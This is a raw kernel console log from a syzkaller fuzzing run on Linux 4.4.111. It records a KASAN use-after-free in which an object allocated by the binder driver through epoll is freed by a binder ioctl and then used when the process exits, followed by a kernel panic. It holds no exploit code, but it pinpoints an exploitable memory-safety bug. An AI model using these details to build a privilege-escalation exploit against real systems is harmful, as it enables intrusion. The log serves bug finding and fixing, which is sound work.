[ 17.172063] random: sshd: uninitialized urandom read (32 bytes read, 33 bits of entropy available) [....] Starting OpenBSD Secure Shell server: sshd[?25l[?1c7[1G[[32m ok [39;49m8[?25h[?0c. [....] Starting file context maintaining daemon: restorecond[?25l[?1c7[1G[[32m ok [39;49m8[?25h[?0c. Debian GNU/Linux 7 syzkaller ttyS0 syzkaller login: [ 20.795439] random: sshd: uninitialized urandom read (32 bytes read, 37 bits of entropy available) [ 21.116230] random: sshd: uninitialized urandom read (32 bytes read, 37 bits of entropy available) [ 22.024409] random: sshd: uninitialized urandom read (32 bytes read, 111 bits of entropy available) [ 22.185610] random: sshd: uninitialized urandom read (32 bytes read, 115 bits of entropy available) Warning: Permanently added '10.128.15.234' (ECDSA) to the list of known hosts. [ 27.543269] random: sshd: uninitialized urandom read (32 bytes read, 119 bits of entropy available) executing program [ 27.640165] ================================================================== [ 27.647568] BUG: KASAN: use-after-free in __lock_acquire+0x387e/0x4b50 [ 27.654203] Read of size 8 at addr ffff8801d0063738 by task syzkaller556576/3325 [ 27.661700] [ 27.663299] CPU: 1 PID: 3325 Comm: syzkaller556576 Not tainted 4.4.111-g3301b55 #17 [ 27.671058] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 [ 27.680392] 0000000000000000 5114cc09b5429541 ffff8801d14af850 ffffffff81d0509d [ 27.688381] ffffea0007401880 ffff8801d0063738 0000000000000000 ffff8801d0063738 [ 27.696376] 0000000000000000 ffff8801d14af888 ffffffff814fd433 ffff8801d0063738 [ 27.704342] Call Trace: [ 27.706922] [] dump_stack+0xc1/0x124 [ 27.712287] [] print_address_description+0x73/0x260 [ 27.718937] [] kasan_report+0x285/0x370 [ 27.724541] [] ? __lock_acquire+0x387e/0x4b50 [ 27.730656] [] __asan_report_load8_noabort+0x14/0x20 [ 27.737393] [] __lock_acquire+0x387e/0x4b50 [ 27.743360] [] ? __lock_acquire+0xb5f/0x4b50 [ 27.749408] [] ? debug_check_no_locks_freed+0x2c0/0x2c0 [ 27.756395] [] ? trace_hardirqs_on_caller+0x38b/0x590 [ 27.763211] [] ? debug_check_no_locks_freed+0x2c0/0x2c0 [ 27.770196] [] ? debug_check_no_locks_freed+0x2c0/0x2c0 [ 27.777179] [] lock_acquire+0x15e/0x460 [ 27.782784] [] ? remove_wait_queue+0x14/0x40 [ 27.788819] [] _raw_spin_lock_irqsave+0x4e/0x70 [ 27.795111] [] ? remove_wait_queue+0x14/0x40 [ 27.801159] [] remove_wait_queue+0x14/0x40 [ 27.807029] [] ep_unregister_pollwait.isra.6+0xa8/0x220 [ 27.814024] [] ? ep_unregister_pollwait.isra.6+0x114/0x220 [ 27.821281] [] ? ep_free+0x1c0/0x1c0 [ 27.826622] [] ep_free+0x93/0x1c0 [ 27.831697] [] ? ep_free+0x1c0/0x1c0 [ 27.837042] [] ep_eventpoll_release+0x44/0x60 [ 27.843171] [] __fput+0x233/0x6d0 [ 27.848259] [] ____fput+0x15/0x20 [ 27.853334] [] task_work_run+0x104/0x180 [ 27.859012] [] do_exit+0x871/0x2a20 [ 27.864264] [] ? handle_mm_fault+0x192d/0x3190 [ 27.870464] [] ? handle_mm_fault+0x3f2/0x3190 [ 27.876596] [] ? release_task+0x1240/0x1240 [ 27.882548] [] do_group_exit+0x108/0x320 [ 27.888225] [] SyS_exit_group+0x1d/0x20 [ 27.893815] [] ? do_group_exit+0x320/0x320 [ 27.899666] [] do_fast_syscall_32+0x314/0x890 [ 27.905785] [] sysenter_flags_fixed+0xd/0x17 [ 27.911805] [ 27.913400] Allocated by task 3325: [ 27.916989] [] save_stack_trace+0x26/0x50 [ 27.922870] [] save_stack+0x43/0xd0 [ 27.928228] [] kasan_kmalloc+0xad/0xe0 [ 27.933864] [] kmem_cache_alloc_trace+0x100/0x2b0 [ 27.940435] [] binder_get_thread+0x181/0x7a0 [ 27.946573] [] binder_poll+0x4a/0x210 [ 27.952121] [] SyS_epoll_ctl+0x10b1/0x2050 [ 27.958082] [] do_fast_syscall_32+0x314/0x890 [ 27.964305] [] sysenter_flags_fixed+0xd/0x17 [ 27.970453] [ 27.972059] Freed by task 3325: [ 27.975303] [] save_stack_trace+0x26/0x50 [ 27.981191] [] save_stack+0x43/0xd0 [ 27.986549] [] kasan_slab_free+0x72/0xc0 [ 27.992342] [] kfree+0xfc/0x300 [ 27.997368] [] binder_thread_dec_tmpref+0x1c1/0x250 [ 28.004120] [] binder_thread_release+0x27d/0x540 [ 28.010607] [] binder_ioctl+0xb94/0x12e0 [ 28.016425] [] compat_SyS_ioctl+0x28a/0x2540 [ 28.022572] [] do_fast_syscall_32+0x314/0x890 [ 28.028799] [] sysenter_flags_fixed+0xd/0x17 [ 28.034940] [ 28.036540] The buggy address belongs to the object at ffff8801d0063680 [ 28.036540] which belongs to the cache kmalloc-512 of size 512 [ 28.049171] The buggy address is located 184 bytes inside of [ 28.049171] 512-byte region [ffff8801d0063680, ffff8801d0063880) [ 28.061011] The buggy address belongs to the page: [ 28.477005] kasan: CONFIG_KASAN_INLINE enabled [ 28.481472] kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: 0000 [#1] PREEMPT SMP KASAN [ 28.494380] Dumping ftrace buffer: [ 28.497908] (ftrace buffer empty) [ 28.501609] Modules linked in: [ 28.504923] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.4.111-g3301b55 #17 [ 28.511929] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 [ 28.521376] task: ffffffff84217840 task.stack: ffffffff84200000 [ 28.527427] RIP: 0010:[] [] debug_object_deactivate+0x1a6/0x3c0 [ 28.536840] RSP: 0018:ffff8801db207d10 EFLAGS: 00010803 [ 28.542298] RAX: 0000000000000096 RBX: e90006e0d8e80b0f RCX: ffff8801d2bc1030 [ 28.549568] RDX: 1d2000dc1b1d0164 RSI: ffffffff842c2560 RDI: e90006e0d8e80b27 [ 28.556836] RBP: ffff8801db207dd8 R08: 1ffff1003aa8d50d R09: ffffffff85132d90 [ 28.564116] R10: 0000000000000001 R11: 1ffff1003b640f68 R12: 1ffff1003b640fa6 [ 28.571467] R13: 0000000000000004 R14: dffffc0000000000 R15: ffffffff85774b88 [ 28.578730] FS: 0000000000000000(0000) GS:ffff8801db200000(0000) knlGS:0000000000000000 [ 28.586952] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 28.592829] CR2: 0000560ade1c0100 CR3: 00000001d1622000 CR4: 0000000000160670 [ 28.600092] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 28.607356] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 28.614615] Stack: [ 28.616750] 0000000000000000 0000000000000000 ffffffff842c2560 ffff8801d2bc1030 [ 28.624812] 0000000041b58ab3 ffffffff83fcca49 ffffffff81d66eb0 ffffffff812a1f7c [ 28.632835] ffffffff00000000 ffffffff00000000 0000000000000000 ffffffff83868f20 [ 28.640855] Call Trace: [ 28.643423] [ 28.645479] [] ? debug_object_activate+0x500/0x500 [ 28.652351] [] ? run_timer_softirq+0x60c/0xbb0 [ 28.658600] [] ? _raw_spin_unlock_irq+0x27/0x50 [ 28.664935] [] ? init_timer_key+0x360/0x360 [ 28.670908] [] ? init_timer_key+0x360/0x360 [ 28.676882] [] ? tcp_write_timer_handler+0x6d0/0x6d0 [ 28.683656] [] run_timer_softirq+0x336/0xbb0 [ 28.689714] [] ? msleep+0xe0/0xe0 [ 28.694819] [] __do_softirq+0x24d/0xa59 [ 28.700456] [] irq_exit+0x119/0x140 [ 28.705732] [] smp_apic_timer_interrupt+0x7b/0xa0 [ 28.712230] [] apic_timer_interrupt+0xa0/0xb0 [ 28.718365] [ 28.720431] [] ? native_safe_halt+0x6/0x10 [ 28.726615] [] default_idle+0x55/0x3c0 [ 28.732153] [] arch_cpu_idle+0xa/0x10 [ 28.737608] [] default_idle_call+0x48/0x70 [ 28.743516] [] cpu_startup_entry+0x605/0x820 [ 28.749577] [] ? call_cpuidle+0xe0/0xe0 [ 28.755199] [] rest_init+0x189/0x190 [ 28.760557] [] start_kernel+0x6b9/0x6ee [ 28.766177] [] ? thread_stack_cache_init+0xb/0xb [ 28.772580] [] ? early_idt_handler_array+0x120/0x120 [ 28.779352] [] ? early_idt_handler_array+0x120/0x120 [ 28.786128] [] x86_64_start_reservations+0x2a/0x2c [ 28.792704] [] x86_64_start_kernel+0x140/0x163 [ 28.798924] Code: eb 1a 48 89 da 48 c1 ea 03 42 80 3c 32 00 0f 85 86 01 00 00 48 8b 1b 48 85 db 74 7a 48 8d 7b 18 41 83 c5 01 48 89 fa 48 c1 ea 03 <42> 80 3c 32 00 0f 85 3c 01 00 00 48 3b 4b 18 75 c6 48 8d 7b 10 [ 28.826192] RIP [] debug_object_deactivate+0x1a6/0x3c0 [ 28.833243] RSP [ 28.836861] ---[ end trace db60c1ef689bca77 ]--- [ 28.841613] Kernel panic - not syncing: Fatal exception in interrupt [ 29.764181] PANIC: double fault, error_code: 0x0 [ 29.768969] CPU: 1 PID: 3325 Comm: syzkaller556576 Tainted: G D 4.4.111-g3301b55 #17 [ 29.777965] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 [ 29.787410] task: ffff8801d19a0000 task.stack: ffff8801d14a8000 [ 29.793444] RIP: 0010:[] [] dump_page_badflags+0x1a/0x250 [ 29.802289] RSP: 0018:ffff880100000000 EFLAGS: 00010086 [ 29.807970] RAX: ffff8801d19a0000 RBX: ffffea0007401880 RCX: ffffffff8148f980 [ 29.815218] RDX: 0000000000000000 RSI: ffffffff838a83a0 RDI: ffffea0007401880 [ 29.822718] RBP: ffff880100000030 R08: 0000000000000001 R09: 0000000000000000 [ 29.829974] R10: 0000000000000002 R11: fffffbfff0ad781e R12: 0000000000000000 [ 29.837218] R13: ffffffff838a83a0 R14: 0000000000000000 R15: 0000000000000000 [ 29.844478] FS: 0000000000000000(0000) GS:ffff8801db300000(0000) knlGS:0000000000000000 [ 29.852672] CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033 [ 29.858524] CR2: ffff8800fffffff8 CR3: 000000000420c000 CR4: 0000000000160670 [ 29.865765] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 29.873005] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 29.880242] Stack: [ 29.882363] [ 29.883960] Call Trace: [ 29.886510] [ 29.888547] Code: e2 06 00 e9 1d fd ff ff 66 0f 1f 84 00 00 00 00 00 55 48 89 e5 41 57 41 56 41 55 49 89 f5 41 54 49 89 d4 53 48 89 fb 48 83 ec 08 61 06 ed ff 48 8d 7b 10 48 b8 00 00 00 00 00 fc ff df 48 89 [ 29.973203] Shutting down cpus with NMI [ 29.977652] Dumping ftrace buffer: [ 29.981160] (ftrace buffer empty) [ 29.984837] Kernel Offset: disabled [ 29.988431] Rebooting in 86400 seconds..